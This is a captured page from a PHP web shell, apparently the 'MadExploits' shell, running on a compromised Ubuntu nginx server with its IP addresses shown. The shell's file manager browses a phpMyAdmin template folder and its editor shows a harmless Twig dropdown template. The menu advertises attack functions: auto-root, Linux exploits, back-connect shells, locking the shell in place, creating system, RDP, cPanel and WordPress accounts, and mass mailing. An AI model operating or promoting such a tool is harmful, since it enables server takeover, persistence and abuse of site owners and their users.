Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
phpmyadmin /
templates /
table /
relation /
[ HOME SHELL ]
Name
Size
Permission
Action
common_form.twig
11.45
KB
-rw-r--r--
dropdown_generate.twig
309
B
-rw-r--r--
foreign_key_row.twig
5.7
KB
-rw-r--r--
relational_dropdown.twig
697
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : relational_dropdown.twig
<select name="{{ name }}" title="{{ title }}"> <option value=""></option> {% set seen_key = false %} {% for value in values %} <option value="{{ value }}" {%- if (foreign is not same as(false) and value == foreign) or (not foreign and db is defined and db is same as (value)) %} selected="selected" {%- set seen_key = true -%} {%- endif %}> {{ value }} </option> {% endfor %} {% if foreign is not same as(false) and foreign != "" and not seen_key %} <option value="{{ foreign }}" selected="selected"> {{ foreign }} </option> {% endif %} </select>
Close